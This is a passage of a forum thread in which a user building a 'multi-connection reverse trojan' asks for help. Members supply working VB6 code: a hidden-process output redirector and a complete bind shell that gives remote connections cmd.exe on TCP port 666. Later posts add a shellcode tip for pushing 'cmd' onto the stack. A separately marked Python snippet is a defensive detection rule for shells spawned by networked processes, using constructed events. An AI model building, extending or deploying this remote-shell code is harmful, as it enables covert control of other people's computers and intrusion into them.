Hi,
A few years ago I wrote a multi-connection reverse trojan.
I've picked it up again now because I want to use it again, and I'm in the middle of getting it to send commands to the remote cmd and receive back what happens (e.g. I type dir C:\ and it returns the result, listing the files in C:\).
For this I found this cmd pipe code:
'Redirects output from console program to textbox.
'Requires two textboxes and one command button.
'Set MultiLine property of Text2 to true.
'
'Original bcx version of this program was made by
' dl <dl@tks.cjb.net>
'VB port was made by Jernej Simoncic <jernej@isg.si>
'Visit Jernejs site at http://www2.arnes.si/~sopjsimo/
'
'Note: don't run plain DOS programs with this example
'under Windows 95,98 and ME, as the program freezes when
'execution of program is finished.
Option Explicit

Private Declare Function CreatePipe Lib "kernel32" (phReadPipe As Long, phWritePipe As Long, lpPipeAttributes As SECURITY_ATTRIBUTES, ByVal nSize As Long) As Long
Private Declare Sub GetStartupInfo Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As STARTUPINFO)
Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As Long
    lpDesktop As Long
    lpTitle As Long
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Byte
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Type OVERLAPPED
    Internal As Long
    InternalHigh As Long
    offset As Long
    OffsetHigh As Long
    hEvent As Long
End Type

Private Const STARTF_USESHOWWINDOW = &H1
Private Const STARTF_USESTDHANDLES = &H100
Private Const SW_HIDE = 0
Private Const EM_SETSEL = &HB1
Private Const EM_REPLACESEL = &HC2

Private Sub Command1_Click()
    Command1.Enabled = False
    Redirect Text1.Text, Text2
    Command1.Enabled = True
End Sub

Private Sub Form_Load()
    Text1.Text = "ping"
End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
    If Command1.Enabled = False Then Cancel = True
End Sub

Sub Redirect(cmdLine As String, objTarget As Object)
    Dim i%, t$
    Dim pa As SECURITY_ATTRIBUTES
    Dim pra As SECURITY_ATTRIBUTES
    Dim tra As SECURITY_ATTRIBUTES
    Dim pi As PROCESS_INFORMATION
    Dim sui As STARTUPINFO
    Dim hRead As Long
    Dim hWrite As Long
    Dim bRead As Long
    Dim lpBuffer(1024) As Byte

    ' The pipe handles must be inheritable so the child can write to the pipe.
    pa.nLength = Len(pa)
    pa.lpSecurityDescriptor = 0
    pa.bInheritHandle = True
    pra.nLength = Len(pra)
    tra.nLength = Len(tra)

    If CreatePipe(hRead, hWrite, pa, 0) <> 0 Then
        sui.cb = Len(sui)
        GetStartupInfo sui
        ' Point the child's stdout and stderr at the write end of the pipe and hide its window.
        sui.hStdOutput = hWrite
        sui.hStdError = hWrite
        sui.dwFlags = STARTF_USESHOWWINDOW Or STARTF_USESTDHANDLES
        sui.wShowWindow = SW_HIDE
        If CreateProcess(vbNullString, cmdLine, pra, tra, True, 0, Null, vbNullString, sui, pi) <> 0 Then
            SetWindowText objTarget.hwnd, ""
            Do
                Erase lpBuffer()
                ' ReadFile blocks until the child writes; it fails once the child
                ' has exited and no write handle to the pipe remains open.
                If ReadFile(hRead, lpBuffer(0), 1023, bRead, ByVal 0&) Then
                    ' Append the chunk at the end of the textbox.
                    SendMessage objTarget.hwnd, EM_SETSEL, -1, 0
                    SendMessage objTarget.hwnd, EM_REPLACESEL, False, lpBuffer(0)
                    DoEvents
                Else
                    CloseHandle pi.hThread
                    CloseHandle pi.hProcess
                    Exit Do
                End If
                ' Drop the parent's copy of the write end; only the first call
                ' succeeds, later calls fail harmlessly.
                CloseHandle hWrite
            Loop
            CloseHandle hRead
        End If
    End If
End Sub

To send commands like cd or dir you have to prepend "cmd /k" (e.g. cmd /k dir C:\); don't ask me why (if someone can explain why it has to be done that way, I'd appreciate it, hahaha).
But anyway, the problem is that when I send a command like dir or cd, I get this error:
Quote:
Error '9' en tiempo de ejecucion:
el subindice esta fuera del intervalo
Help please! Thanks in advance.
There is a way to do this properly, which is to connect stdio to a socket; later, if I have a moment, I'll write it and post it.
OK, that would be much appreciated!
Any other ideas?
Thanks ;D
How do I know which timer is the one that is "out of range"? And what does it mean that it's out of range? Sorry if my question is a bit noob, but it's been a long time since I touched VB 6.
Quote:
Error '9' en tiempo de ejecucion:
el subindice esta fuera del intervalo
Thanks :)
On which line exactly does the error occur?
OK, here is the example:
'---------------------------------------------------------------------------------------
' Module      : mMS
' DateTime    : 12/13/2009 20:16
' Author      : Cobein
' Mail        : cobein27@hotmail.com
' WebPage     : http://www.advancevb.com.ar
' Purpose     : Remote shell
' Usage       : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
'               applications, but you may not reproduce
'               or publish this code on any web site,
'               online service, or distribute as source
'               on any media without express permission.
'
' Reference   : NGS - Writing small shellcode paper
'
' History     : 12/13/2009 First Cut....................................................
'---------------------------------------------------------------------------------------
Option Explicit

Private Const INFINITE As Long = &HFFFF
Private Const SOCK_STREAM As Long = 1
Private Const AF_INET As Long = 2
Private Const IPPROTO_TCP As Long = 6
Private Const STARTF_USESTDHANDLES As Long = &H100
Private Const STARTF_USESHOWWINDOW As Long = &H1
Private Const WSADESCRIPTION_LEN As Long = 257
Private Const WSASYS_STATUS_LEN As Long = 129

Public Type WSAData
    wVersion As Integer
    wHighVersion As Integer
    szDescription As String * WSADESCRIPTION_LEN
    szSystemStatus As String * WSASYS_STATUS_LEN
    iMaxSockets As Integer
    iMaxUdpDg As Integer
    lpVendorInfo As Long
End Type

Public Type sockaddr_in
    sin_family As Integer
    sin_port As Integer
    sin_addr As Long
    sin_zero(1 To 8) As Byte
End Type

Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Byte
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVR As Long, lpWSAD As WSAData) As Long
Private Declare Function WSACleanup Lib "ws2_32.dll" () As Long
Private Declare Function bind Lib "ws2_32.dll" (ByVal s As Long, ByRef name As sockaddr_in, ByRef namelen As Long) As Long
Private Declare Function listen Lib "ws2_32.dll" (ByVal s As Long, ByVal backlog As Long) As Long
Private Declare Function accept Lib "ws2_32.dll" (ByVal s As Long, ByRef addr As sockaddr_in, ByRef addrlen As Long) As Long
Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function htons Lib "wsock32.dll" (ByVal hostshort As Long) As Integer
Private Declare Function WSASocketA Lib "ws2_32.dll" (ByVal af As Long, ByVal lType As Long, ByVal protocol As Long, ByRef lpProtocolInfo As Any, ByRef g As Any, ByVal dwFlags As Long) As Long
Private Declare Function closesocket Lib "wsock32.dll" (ByVal s As Long) As Long

Public Sub Main()
    Dim lSock As Long
    Dim tSA As sockaddr_in
    Dim tWD As WSAData
    Dim lHandle As Long
    Const PORT As Long = 666

    If WSAStartup(&H101, tWD) = 0 Then
        lSock = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, ByVal 0&, ByVal 0&, ByVal 0&)
        If Not lSock = -1 Then
            With tSA
                .sin_family = 2
                .sin_port = htons(PORT)
            End With
            If bind(lSock, tSA, Len(tSA)) = 0 Then
                If listen(lSock, 0&) = 0 Then
                    ' Blocks here until a client connects.
                    lHandle = accept(lSock, tSA, Len(tSA))
                    Dim tSTARTUPINFO As STARTUPINFO
                    Dim tPROCESS_INFORMATION As PROCESS_INFORMATION
                    Dim tSECURITY_ATTRIBUTES As SECURITY_ATTRIBUTES
                    tSECURITY_ATTRIBUTES.nLength = Len(tSECURITY_ATTRIBUTES)
                    ' The child's standard handles are the accepted socket itself.
                    With tSTARTUPINFO
                        .cb = Len(tSTARTUPINFO)
                        .dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
                        .hStdInput = lHandle
                        .hStdOutput = lHandle
                        .hStdError = lHandle
                    End With
                    If CreateProcessA(vbNullString, "cmd", _
                                      tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
                                      0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then
                        Call WaitForSingleObject(tPROCESS_INFORMATION.hProcess, INFINITE)
                    End If
                End If
            End If
            Call closesocket(lHandle)
        End If
        Call WSACleanup
    End If
End Sub

A few things to keep in mind:
1- The code will freeze while it waits for a connection.
2- There are many structures that could be left out, but I kept them so the example is clearer.
3- You can connect using telnet (open localhost 666); on Vista, and I'm not sure about 7, telnet isn't installed by default.
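From the defender's side, the module above leaves a recognisable trace: the process that accepts the TCP connection is the same process that, moments later, starts cmd.exe with inherited handles. Neither event is suspicious by itself; the two together are the shape of a shell bound to a socket. The following Python script is an added illustration, not code from this thread or from Cobein. It correlates process-creation events with network events the way a SIEM rule would, using Sysmon-style field names (Event ID 1 = process create, Event ID 3 = network connect); the events, image paths, PIDs and timestamps are constructed samples.

```python
"""Flag command interpreters spawned by a process that just handled a
TCP connection. Added illustration with constructed Sysmon-style events;
not code from the thread above."""
from datetime import datetime, timedelta

# Interpreters we do not expect a networked, non-interactive parent to spawn.
SHELL_IMAGES = {"cmd.exe", "command.com", "powershell.exe"}

# Constructed sample events (Sysmon-like fields), in arrival order.
SAMPLE_EVENTS = [
    {"EventId": 1, "UtcTime": "2009-12-13 20:16:00", "ProcessId": 4100,
     "Image": r"C:\tools\mms.exe", "ParentProcessId": 1234,
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "mms.exe"},
    # Inbound connection accepted on port 666 by the listener process.
    {"EventId": 3, "UtcTime": "2009-12-13 20:16:05", "ProcessId": 4100,
     "Image": r"C:\tools\mms.exe", "Initiated": False,
     "SourcePort": 666, "DestinationPort": 50123},
    # One second later the same process starts cmd.exe.
    {"EventId": 1, "UtcTime": "2009-12-13 20:16:06", "ProcessId": 4120,
     "Image": r"C:\Windows\System32\cmd.exe", "ParentProcessId": 4100,
     "ParentImage": r"C:\tools\mms.exe", "CommandLine": "cmd"},
    # A normal interactive shell: explorer -> cmd, no network event on the parent.
    {"EventId": 1, "UtcTime": "2009-12-13 20:20:00", "ProcessId": 5000,
     "Image": r"C:\Windows\System32\cmd.exe", "ParentProcessId": 1234,
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd"},
    # Unrelated outbound connection by a process that never spawns a shell.
    {"EventId": 3, "UtcTime": "2009-12-13 20:21:00", "ProcessId": 6000,
     "Image": r"C:\Program Files\browser.exe", "Initiated": True,
     "SourcePort": 51000, "DestinationPort": 443},
]


def _parse(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")


def basename(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def find_socket_shells(events, window_seconds=60):
    """Return one finding per shell whose parent had a network event at most
    `window_seconds` earlier. Each finding records the parent image and PID,
    the child PID, the parent's port pair and whether the connection was
    inbound (the bind-shell case) or initiated by the parent (reverse case)."""
    last_net = {}      # most recent network event per PID
    findings = []
    for ev in sorted(events, key=lambda e: _parse(e["UtcTime"])):
        if ev["EventId"] == 3:
            last_net[ev["ProcessId"]] = ev
        elif ev["EventId"] == 1 and basename(ev["Image"]) in SHELL_IMAGES:
            net = last_net.get(ev["ParentProcessId"])
            if net is None:
                continue
            age = _parse(ev["UtcTime"]) - _parse(net["UtcTime"])
            if timedelta(0) <= age <= timedelta(seconds=window_seconds):
                findings.append({
                    "parent_image": basename(ev["ParentImage"]),
                    "parent_pid": ev["ParentProcessId"],
                    "child_pid": ev["ProcessId"],
                    "local_port": net["SourcePort"],
                    "remote_port": net["DestinationPort"],
                    "inbound": not net.get("Initiated", True),
                })
    return findings


if __name__ == "__main__":
    for f in find_socket_shells(SAMPLE_EVENTS):
        print("shell pid %(child_pid)d spawned by %(parent_image)s (pid %(parent_pid)d), "
              "ports %(local_port)d<->%(remote_port)d, inbound=%(inbound)s" % f)
```

The time window is the knob that controls noise: a long-lived server that legitimately spawns cmd.exe minutes after its last connection would be flagged with a large window and ignored with a small one. Because the accepted socket is inherited rather than created by cmd.exe, the network event is attributed to the parent, which is why the rule keys on the parent PID rather than looking for sockets owned by the shell.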
Very nice code ;D
Just one thing:
If CreateProcessA(vbNullString, "cmd", _
                  tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
                  0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then
Instead of 'cmd' I think '%COMSPEC%' would be better ;)
Quote from: Karcrack on 14 December 2009, 16:59 PM
Very nice code ;D
Just one thing:
If CreateProcessA(vbNullString, "cmd", _
                  tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
                  0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then
Instead of 'cmd' I think '%COMSPEC%' would be better ;)
On which PC wouldn't it be cmd? :xD
I didn't understand what you posted at all :S
Sorry for my ignorance, I'm a newbie... but what is that?
Quote from: YST on 14 December 2009, 20:23 PM
On which PC wouldn't it be cmd? :xD
Any version of W$ before XP :P
Anyway, environment variables ftw!!! :xD
Quote from: Karcrack on 15 December 2009, 19:56 PM
Quote from: YST on 14 December 2009, 20:23 PM
On which PC wouldn't it be cmd? :xD
Any version of W$ before XP :P
Anyway, environment variables ftw!!! :xD
It's there on Windows 2000 ;) and the CreateProcess API has existed since that Windows.. so the code is always cmd, since if it isn't run on a system from Windows 2000 onwards it won't work anyway ;)
Quote from: YST on 15 December 2009, 20:03 PM
It's there on Windows 2000 ;) and the CreateProcess API has existed since that Windows.. so the code is always cmd, since if it isn't run on a system from Windows 2000 onwards it won't work anyway ;)
On W$2000 it's called
command, not
cmd :-\
Quote: cmd.exe is the command interpreter on OS/2 and Windows NT-based systems (including Windows 2000, Windows XP, Windows Server 2003, and Windows Vista).
http://es.wikipedia.org/wiki/Cmd_%28Windows%29
So it isn't in W7 :huh: :huh:
:laugh: :laugh: :laugh: :laugh:
Well, then use the environment variable and that's that! :¬¬ :¬¬
Quote from: Karcrack on 15 December 2009, 21:26 PM
So it isn't in W7 :huh: :huh:
:laugh: :laugh: :laugh: :laugh:
Well, then use the environment variable and that's that! :¬¬ :¬¬
It's not up to date :¬¬
By the way, the environment variable would be slower :P
Fiiiine... you're right :¬¬ :¬¬
Minimum supported client Windows 2000 Professional
CreateProcessA/W exists from W$ 2k onwards... and from W$ 2k onwards you can use cmd... so... well, it's better to use CMD directly! :P
Also, it's more useful for shellcode, since you can push the string onto the stack with a single DWORD! :silbar:
; \0,D,M,C
push $00646D63
:D
I don't understand anything :o
Can someone explain to me how I do it?
Quote from: hepy_92 on 18 December 2009, 14:26 PM
I don't understand anything :o
Can someone explain to me how I do it?
What Cobein posted for you was a lovely Reverse Shell :-* :xD
If you want more info:
http://www.ngssoftware.com/research/papers/WritingSmallShellcode.pdf